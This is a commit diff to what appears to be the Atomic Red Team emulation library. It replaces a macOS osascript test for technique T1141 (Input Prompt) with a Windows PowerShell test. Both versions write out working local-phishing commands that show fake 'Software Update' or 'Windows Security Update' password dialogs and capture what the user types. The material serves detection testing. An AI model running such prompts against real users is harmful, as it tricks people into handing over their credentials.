Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1141/T1141.md

@@ -9,20 +9,21 @@ Adversaries can prompt a user for a number of reasons that mimic normal usage, s
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Prompt User for Password](#atomic-test-1---prompt-user-for-password)
+- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password)
 
 
 <br/>
 
-## Atomic Test #1 - Prompt User for Password
-Prompt User for Password (Local Phishing)
-Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+## Atomic Test #1 - PowerShell - Prompt User for Password
+Prompt User for Password (Local Phishing) as seen in Stitch RAT.
 
-**Supported Platforms:** macOS
+Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+
+**Supported Platforms:** Windows
 
 
-#### Run it with `sh`!
+#### Run it with `command_prompt`!
 ```
-osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
+powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
 ```
 <br/>

atomics/index.md

@@ -513,7 +513,7 @@
 - [T1056 Input Capture](./T1056/T1056.md)
   - Atomic Test #1: Input Capture [windows]
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: Prompt User for Password [macos]
+  - Atomic Test #1: PowerShell - Prompt User for Password [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1142 Keychain](./T1142/T1142.md)
   - Atomic Test #1: Keychain [macos]

atomics/index.yaml

@@ -14393,21 +14393,18 @@ credential-access:
       created: '2017-12-14T16:46:06.044Z'
       identifier: T1141
     atomic_tests:
-    - name: Prompt User for Password
+    - name: PowerShell - Prompt User for Password
       description: |
-        Prompt User for Password (Local Phishing)
-        Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
-      supported_platforms:
-      - macos
-      executor:
-        name: sh
-        command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
-          app "System Preferences" to activate'' -e ''tell app "System Preferences"
-          to display dialog "Software Update requires that you type your password
-          to apply changes." & return & return  default answer "" with icon 1 with
-          hidden answer with title "Software Update"''
+        Prompt User for Password (Local Phishing) as seen in Stitch RAT.
 
-'
+        Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        command: powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows
+          Security Update', '',[Environment]::UserName, [Environment]::UserDomainName);
+          echo $cred.GetNetworkCredential().Password;}
   T1142:
     technique:
       id: attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d

atomics/macos-index.md

@@ -186,7 +186,6 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056 Input Capture](./T1056/T1056.md)
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: Prompt User for Password [macos]
 - [T1142 Keychain](./T1142/T1142.md)
   - Atomic Test #1: Keychain [macos]
 - [T1040 Network Sniffing](./T1040/T1040.md)